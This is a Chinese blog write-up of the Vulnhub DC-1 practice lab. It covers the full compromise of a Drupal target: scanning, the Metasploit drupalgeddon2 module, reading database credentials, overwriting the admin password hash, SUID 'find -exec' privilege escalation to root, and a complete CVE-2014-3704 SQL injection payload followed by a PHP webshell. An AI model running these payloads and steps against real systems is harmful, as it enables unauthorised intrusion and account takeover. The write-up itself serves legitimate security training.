Vulnhub[DC1]

已于 2022-06-11 22:17:21 修改
阅读量105 收藏
点赞数
分类专栏: Vulnhub 文章标签: 网络 安全 学习
于 2022-06-10 22:46:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Townmacro/article/details/125229315
版权

简介

下载

  • DC-1.zip (Size: 733 MB)
  • Download: http://www.five86.com/downloads/DC-1.zip
  • Download (Mirror): https://download.vulnhub.com/dc/DC-1.zip
  • Download (Torrent): https://download.vulnhub.com/dc/DC-1.zip.torrent ( Magnet)

流程

信息收集

主机探活

kali中使用arp-scan进行主机探活

arp-scan --interface eth0 192.168.0.0/24

经过筛选可以知道192.168.0.150 是DC-1的ip

端口扫描

nmap  -p- 192.168.0.150

可以这里开启了22、80、111端口

我们先从80端口入手

这里可以发现用的是DrupalCMS

渗透

Flag1

启动msf,搜索下Drupal可用的EXP

search Drupal

这里我们选用exploit/unix/webapp/drupal_drupalgeddon2

因为他是最新的,而且品质为excellent

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.0.150
show options

run

这样我们就可以成功得到一个会话。

我们用会话返回一个shell

查看目录,获取flag1

Every good CMS needs a config file - and so do you.

翻译:每个好的 CMS 都需要一个配置文件——你也一样。

这里也就是提示说去查看DrupalCMS的配置文件

Flag2

DrupalCMS的默认配置文件为 /var/www/sites/default/settings.php

这里我们获得数据库的账号dbuser和密码R0ck3t

  • flag2
  • Brute force and dictionary attacks aren’t the
  • only ways to gain access (and you WILL need access).
  • What can you do with these credentials?

翻译:

  • 蛮力和字典攻击不是
  • 获得访问权限的唯一方法(您将需要访问权限)。
  • 您可以使用这些凭据做什么?

Flag3

这里我们直接连接mysql之后shell会没有反应的

这里我们需要用python转换成标准的shell

python -c "import pty;pty.spawn('/bin/bash')"

连接mysql

常规的mysql查询

这里的密码是经过drupal加密

在scripts的文件夹中有用来算密码的脚本
但是因为靶机的环境原因会报错

但是可以查到

明文:password
密文:$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4

直接update更新admin密码

update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';

然后进行登录

经过查看可以发现Flag3

Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow.

翻译:特殊权限将有助于查找密码 - 但您需要 -exec 该命令才能确定如何获取阴影中的内容。

这里提示我们提示用find -exec,想到用suid提权

Flag4

使用find / -name flag*.txt命令,直接来查找flag文件,获取到flag4

Can you use this same method to find or access the flag in root?

Probably. But perhaps it’s not that easy. Or maybe it is?

翻译:

您可以使用相同的方法在 root 中查找或访问标志吗?
大概。但也许这并不容易。或者也许是?

提权

使用find找下具有root权限的suid

find / -perm -u=s -type f 2>/dev/null

可以看到find是可以用来提权的

我们尝试用find执行命令

# 这里需要注意-name参数填写的文件名,是需要系统真实存在的
find / -name flag4 -exec "whoami" \;

可以发现这使用的root用户权限

那么我们接下来用find提权

find / -name flag4 -exec "/bin/sh" \;

这里可以发现已经是root用户了

这算是预期解了,按照顺序下来的

非预期解

首先用nmap -A --script=vuln 192.168.0.150扫描靶机

开放了80和22端口,并且存在cve-2014-3704

漏洞利用

cve-2014-3704这个漏洞是sql注入,能直接数据库添加用户名和密码
payload

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0%20;update+users+set+name%3d'root'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=bob&name[0]=a

将上述payload贴进来,发包后,将会创建一个用户名为:root 密码:thanks的账户

成功用新用户登录进去

然后同样的可以找到flag3

flag3提示用find -exec,想到用suid提权

来到modules,开启php filter

新建articel文章,并写入php一句话木马,底下的text format换成PHP code

文章成功发布后,使用蚁剑连接

然后的流程和预期解差不多

也可以根据提示直接提权

Townmacro
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
DC-1 登录框的sql注入
a_153161的博客
12-04 1155
DC-1登录框的报错注入
Drupal <7.32“ Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
weixin_46236101的博客
09-18 703
Drupal是一种少量大量的CMS,其7.0〜7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入,修改管理员信息,甚至执行任意代码。 进攻环境 执行如下命令启动Drupal 7.31环境: docker-compose up -d 环境启动后,访问http://your-ip:8080即可看到Drupal的安装页面,使用替代配置安装即可。 其中,Mysql数据库名填写drupal,数据库用户名,密码为root,地址为mysql: 安装完成后,访问首页: 进攻复现
Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
What_Happened的博客
11-25 3266
2014年10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。        通过测试,我总结了一套完整的利用过程。       (1)利用google查找潜在的目标,关键字很多啦,比如:in
Drupal
xiwangyizhicunzai的博客
12-12 646
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704) Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。 影响版本:7.0~7.31 发送如下数据包 POST /?q=node&destination=node ...
Drupal 7.31 SQL注入漏洞利用详解及EXP
热门推荐
Exploit的小站~
05-10 2万+
 有意迟几天放出来这篇文章以及程序,不过看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,不过说实话这个洞威力挺大的,当然,这也是Drupal本身没有意料到的。 0x00 首先,这个漏洞真的很大,而且Drupal用的也比较多,应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp。不过,这个洞好像不怎么被重视,这也是极为不合适。...
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
flows.homekit.v1.json.zip
02-15
斐讯 DC1 WIFI 排插,官方 APP 已经无法使用,通过 DNS 劫持到自己的服务器,实现手机控制。使用dnsmasq劫持smartplugconnect.phicomm.com到你NodeRed所在IP,下载脚本,全局搜索替换 "您的DC1的MAC地址" 为您的 DC1...
斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT
02-18
DC1固件斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT 斐讯DC1插座固件斐讯DC1插座固件斐讯DC1插座固件
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
黑白的博客
12-22 1254
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
SQL注入——通过注入得到已知用户名的密码
以梦为马,不负韶华
12-08 2万+
· PHP代码如下: <?php //error_reporting(0); $link =mysqli_connect('localhost', 'root', 'root', 'test'); if (!$link) { die('Could not connect to MySQL: ' .mysqli_connect_error()); } $link->se
Drupal 7.31版本爆严重SQL注入漏洞
weixin_30460489的博客
10-16 248
今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码。 在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。 测试代码:(请勿用于非法用途) POST/drupal-7.31/?q=node&destination=nodeHTTP/1.1 Host...
Drupal 远程代码执行漏洞(CVE-2019-6339)
limb0的博客
07-04 9002
Drupal 远程代码执行漏洞(CVE-2019-6339) 一、漏洞介绍 Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。远程攻击者可利用该漏洞执行任意的php代码。 二、漏洞危害 远程代码执行。 三、漏洞验证 环境搭建: 实验环境 系统 IP地址 攻击
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
EC_Carrot的博客
05-27 399
漏洞背景 Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。 漏洞复现 该漏洞无需认证,发送如下数据包即可执行恶意SQL语句: POST /?q=node&destination=node HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User
Tornado 用户注册&登录&登出(User regist&login&logout)
taylorgogo
07-17 2657
Tornado 用户注册&登录&登出(User regist&login&logout) ############################################ @Tornad 英文官网 @Tornado 用户认证(User authentication )示例文档 @Tornado 博客(blog)GitHub 示例代码 ####...
理解HTTP协议
weixin_30399797的博客
08-24 281
1,前言:不管是web开发者还是web渗透者,熟练掌握http协议核心技术点都是非常必要的,深入理解下http协议的关键运作细节,对于我们后面一系列动作的展开都至关重要,当然啦,就http协议本身来讲,还是非常非常复杂的,我们今天就单单站在一个入侵者的角度来学习掌握必要的http协议基础,单靠一篇文档,想全面透彻掌握http协议,肯定不太现实,我们只需要掌握一些我们实际渗透中会用到的东西即...
[CVE-2014-3704]Drupal 7.31 SQL注入漏洞分析与复现
weixin_30940783的博客
06-11 1376
记录下自己的复现思路 漏洞影响: Drupal 7.31 Drupal是一个开源内容管理平台,为数百万个网站和应用程序提供支持。 0x01漏洞复现 复现环境: 1)Apache2.4 2)Php 7.0 3)drupal 7.31https://www.drupal.org/drupal-7.31-release-notes(点击下载) 环境打包在目录下安装即可 ...
bwapp通关(全完结)
hxhxhxhxx的博客
10-20 1万+
bwapp/ A1 - Injection /HTML Injection - Reflected (GET)HTML Injection - Reflected (POST)HTML Injection - Reflected (Current URL)HTML Injection - Stored (Blog)iFrame InjectionLDAP Injection (Search)【待开化】 ---------------------- bWAPP v2.2 -----------------
dc1无法反弹shell
最新发布
08-05
回答: 反弹shell的问题可能是由于配置或命令错误导致的。请确保您按照正确的步骤执行了反弹shell的过程。首先,您需要确保攻击机上的监听程序已经正确启动,可以使用nc命令监听指定的端口。接下来,您需要确保在目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值